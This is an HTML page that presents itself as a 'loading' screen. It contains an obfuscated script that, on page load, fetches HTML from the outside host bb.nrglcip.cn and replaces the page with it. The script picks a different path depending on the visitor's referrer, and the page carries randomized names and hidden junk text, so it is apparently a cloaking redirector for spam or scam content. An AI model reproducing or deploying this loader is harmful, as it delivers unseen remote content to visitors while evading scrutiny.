<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .cJK4jhEtW {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .cJK4jhEtW .EYTeZFA {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .cJK4jhEtW .content {
            line-height: 50px;
            text-align: center
        }

        .cJK4jhEtW .img {
            width: 100%
        }

        .cJK4jhEtW .ZF0Fx3Z9ht {
            text-align: center
        }

        .cJK4jhEtW .ZF0Fx3Z9ht span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .cJK4jhEtW .ZF0Fx3Z9ht span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .cJK4jhEtW .ZF0Fx3Z9ht span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .cJK4jhEtW .ZF0Fx3Z9ht span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .cJK4jhEtW .ZF0Fx3Z9ht span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .cJK4jhEtW .ZF0Fx3Z9ht span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .cJK4jhEtW .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function Pd73NJzryAB(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var tDwwce = Pd73NJzryAB('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ tDwwce +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ tDwwce +".html?a=share";
		}
		
        TT1Mtg8Z=url+"#"+new Date().getTime();
        TT1Mtg8Z && function() {
            $.get(TT1Mtg8Z, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<img  src='' style='display:none'>
<h1 style='display:none' >jZxgsZjE3enrsN4OiuEiRaI0L8PgSaew2wOQsZ6eNbAbebSeFp0ceYDYyUEP6Psep8rUqs6CGvXP84rByKWq</h1>
<img  src='' style='display:none'>
<ul style='display:none' >eiBRFiuU42mdWfPnPffgjZKXuCjkTEkSRnB5zCCNP1xZ</ul><div class="cJK4jhEtW">
    <div class="EYTeZFA">
        <div class="ZF0Fx3Z9ht">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<a  href='#' style='display:none'>wPz00cnGOHu4TzeHGv2coj5QsLICnHmaicHURl2a</a>
<ul style='display:none' >DekTyZ9CprMwBm5yZwTcYwe2Cgc</ul>
<b style='display:none' >FeCCCCGDB4ggiSwvxkAndLTuN3M1sK856CC90WYzg3k024b9FwFTig</b></body>
</html>